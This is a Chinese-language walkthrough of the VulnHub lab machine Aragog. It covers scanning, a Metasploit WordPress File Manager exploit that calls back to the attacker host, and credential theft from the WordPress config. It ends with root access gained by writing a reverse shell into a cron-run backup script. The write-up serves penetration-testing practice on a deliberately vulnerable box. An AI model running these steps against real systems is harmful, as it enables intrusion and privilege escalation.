渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

靶机介绍

下载地址：https://www.vulnhub.com/entry/harrypotter-aragog-102,688/
作者Mansoor R在VulnHub上上传了哈利波特系列的三个靶机，以哈利波特为故事背景，玩家需要找到这三个靶机中的共8个魂器，打败伏地魔！这就冲起来！
首先是第一个靶机Aragog，以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名，题目中提示这个靶机里面有两个魂器。

渗透过程

获取ip

从VlunHub上下载靶机，在virtualbox上打开，设置网络模式为桥接，让靶机和kali以及主机在一个局域网里。

我们挑战的第一步是先进行主机发现 arp-scan -l

PCS Systemtechnik GmbH这一行就是靶机的IP。

信息收集

接下来，扫描开放端口以了解目标上暴露的服务

nmap -A -T4 -p- 172.16.53.58

它向我展示了目标上只有 HTTP 和ssh可用

网站信息收集

只有一张图片

爆破一下网站目录

dirb http://172.16.53.58

我们尝试访问blog这个目录

我们能发现这个站点是利用wordpress搭建的

既然是wordpress，我决定用wpscan枚举一下

(ps：wpscan是一个扫描WordPress漏洞的扫描器)

去注册个免费的账号获取api-token

https://wpscan.com/

wpscan --api-token=免费版的就行 --url= http://172.16.53.58/blog -e p --plugins-detection aggressive

扫出3个问题，全是File Manager的漏洞  

漏洞利用

msf getshell

msf检索漏洞exp

search wordpress File Manager

use 0

set rhosts 172.16.53.58

set targeturi /blog

set lhost 172.16.53.31

run

我们成功拿到了shell

我们利用python打开一个交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

wordpress搭建的网站mysql账号密码会记录在/etc/wordpress目录里的config-default.php 文件里面

在里面看到了数据库的root密码

通过账密登录MySQL数据库

在wordpress数据库下，wp_users表中找到一个登录记录

解密后我们得到了账号的密码

尝试ssh登录

成功登录

我们在当前目录下发现了第一个魂器

提权

我们在kali上面启动一个python服务器

python -m SimpleHTTPServer 2333

接下来利用wget 把提权漏洞检测脚本下载到靶机/tmp这个目录下

wget 172.16.53.31:2333/linpeas.sh

提升一下linpeas.sh 的权限   chmod 777 linpeas.sh

执行一下 ./linpeas.sh

运行脚本后发现了俩个CVE漏洞 经过实际测试都没能成功提权

在这一处我们能发现一个隐藏的脚本文件 .backup.sh

我们尝试去访问

这个脚本的大概意思是，把上传的文件复制到tmp这个目录里  

属于每过一段时间就会自动运行的那种

在kali上下载pspy64,然后复制到靶机/tmp目录下。
pspy64地址：GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

还是利用刚刚的方法wegt下载到靶机的tmp目录下

执行后我们能发现这个脚本的UID是0

 

那说明我们向这个脚本写入反弹shell 就能获取到root权限了

创建反弹shell网站 Online - Reverse Shell Generator

我们输入kali的ip地址就能生成一串反弹shell代码

把反弹shell的代码写入脚本文件中

在kali上进行监听

我们成功拿到了root权限

我们在当前目录下发现了第二个魂器